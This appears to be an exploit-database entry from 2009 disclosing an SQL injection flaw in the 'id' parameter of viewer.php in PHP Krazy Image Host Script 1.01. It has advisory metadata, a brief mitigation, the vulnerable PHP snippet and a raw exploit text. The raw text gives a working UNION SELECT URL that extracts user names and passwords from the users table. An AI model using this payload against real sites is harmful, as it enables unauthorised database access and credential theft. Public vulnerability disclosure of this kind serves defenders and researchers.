PHP Krazy Image Host Script 1.01

vendor:

PHP Krazy Image Host Script

by:

x0r

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: PHP Krazy Image Host Script

Affected Version From: 01.01

Affected Version To: 01.01

Patch Exists: YES

Related CWE: N/A

CPE: a:php_krazy_image_host_script:php_krazy_image_host_script:1.01

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

PHP Krazy Image Host Script 1.01

A vulnerability exists in PHP Krazy Image Host Script 1.01 due to improper sanitization of user-supplied input in the 'id' parameter of the 'viewer.php' script. An attacker can exploit this vulnerability to inject arbitrary SQL commands and gain access to the application database, resulting in the disclosure of sensitive information.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.

Source

Exploit-DB raw data:

#########################################################################################
[0x01] Informations:

Name           : PHP Krazy Image Host Script 1.01
Download       : http://www.hotscripts.com/listings/jump/download/66961/
Vulnerability  : Sql Injection
Author         : x0r
Contact        : andry2000@hotmail.it
Notes          : Proud to be Italian
#########################################################################################
[0x02] Bug:

Bugged file is /[path]/viewer.php

[Code]
	 	$id = $_GET['id']; [...]
$query="SELECT * FROM images WHERE id=" . $id;
$result = mysql_query($query);
[/code]

#########################################################################################
[0x03] Exploit:

Exploit: http://victim.it/viewer.php?id=-1 union select
0,0,0,concat(id,char(45),user,char(45),password),0,0, from users--

########################################################################################

# milw0rm.com [2009-02-12]